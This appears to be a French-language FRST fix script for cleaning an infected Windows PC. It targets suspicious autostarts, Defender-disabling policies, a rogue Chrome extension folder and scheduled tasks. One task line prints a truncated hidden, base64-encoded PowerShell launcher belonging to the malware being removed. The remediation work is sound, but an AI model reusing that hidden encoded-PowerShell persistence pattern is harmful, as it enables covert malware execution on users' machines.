start::
closeprocesses:
createrestorepoint:
virustotal: C:\Users\Mika\AppData\Roaming\streamlink-twitch-gui\streamlink-twitch-gui.exe
virustotal: C:\Users\Mika\AppData\Roaming\Entertainment\Entertainment.exe
CustomCLSID: HKU\S-1-5-21-4004790480-3760080704-898729276-1001_Classes\CLSID\{91A41FCC-BC02-42D8-A36E-0D27FF9BFFC8}\InprocServer32 -> C:\Users\Mika\AppData\Local\Google\Update\1.3.33.7\psuser_64.dll => Pas de fichier
AlternateDataStreams: C:\Users\Mika\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Mika\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\Public\AppData:CSM [476]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [454]
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_281\bin\ssv.dll [2021-03-27] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_281\bin\jp2ssv.dll [2021-03-27] (Oracle America, Inc. -> Oracle Corporation)
AdobeFlashPlayerUpdateSvc
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction <==== ATTENTION
HKU\S-1-5-21-4004790480-3760080704-898729276-1001\...\Run: [CE72B74C1A31682C2FA24E80E568EE645BC3E0E1._service_run] => "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=service /prefetch:8 [3891624 2022-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKU\S-1-5-21-4004790480-3760080704-898729276-1001\...\Run: [streamlink-twitch-gui] => C:\Users\Mika\AppData\Roaming\streamlink-twitch-gui\streamlink-twitch-gui.exe [2081280 2021-12-19] (The NW.js Community) [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-4004790480-3760080704-898729276-1001\...\Run: [Entertainment] => C:\Users\Mika\AppData\Roaming\Entertainment\Entertainment.exe [134356715 2022-05-09] (EntertainmentSoftware) [Fichier non signé] <==== ATTENTION
HKU\S-1-5-21-4004790480-3760080704-898729276-1001\...\MountPoints2: {afff6742-5d78-11eb-83d5-806e6f6e6963} - "D:\autorun.exe"
HKU\S-1-5-21-4004790480-3760080704-898729276-1001\...\Winlogon: [Shell] C:\Windows\explorer.exe [5154664 2022-10-08] (Microsoft Windows -> Microsoft Corporation) <==== ATTENTION
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {0A60F800-34E7-4D5D-A14E-0592D30AAD73} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_414_pepper.exe [1471032 2020-08-11] (Adobe Inc. -> Adobe)
Task: {274C125C-78F4-4648-BA61-823CC6B6B691} - System32\Tasks\chrome customize => cmd /c powershell -WindowStyle Hidden -E "CgAKACQAdgBhAHIASgA9ACQAbgB1AGwAbAA7AAoACgAKACQAcABhAFIATQAgAD0AIAAiAFcAeQBJAHoATwBEAGsAMQBOAGoARQB3AE8ARABVAHoATwBUAFUAegBNAHoAawB6AE4AegBJAHkASQBpAHcAeABOAGoAWQAxAE0ARABnADUATQBUAEEAMQBMAEMASgBPAFIARgBrAHcAVABtAHAATgBTAEUAUgBuAE0ARQBSAEMAVQBWAFYASABSAEUARgBOAF (l'élément de données a 5407 caractères en plus). <==== ATTENTION
Task: {A8B315D5-99C3-4292-BBE5-0AAD230A4DD4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-08-11] (Adobe Inc. -> Adobe)
Task: {B32C7C20-C5A9-4C15-87CB-45B59EE13868} - \chrome data -> Pas de fichier <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3: <==== ATTENTION (Restriction - Zones)
Edge Extension: (Pas de nom) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [non trouvé(e)]
Edge Extension: (Pas de nom) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [non trouvé(e)]
Edge Extension: (Pas de nom) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [non trouvé(e)]
Edge Extension: (Pas de nom) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [non trouvé(e)]
CHR Notifications: Default -> hxxps://romsmode.com; hxxps://www.zone-telechargement.lol
CHR Extension: (Mouse) - C:\Users\Mika\AppData\Local\chrome_data [2022-10-14]
S3 BraveElevationService; "C:\Program Files (x86)\BraveSoftware\Brave-Browser\Application\107.1.45.116\elevation_service.exe" [X]
2022-10-14 19:01 - 2022-10-14 19:01 - 000000000 ____D C:\Users\Mika\AppData\Local\chrome_data
emptytemp:
end::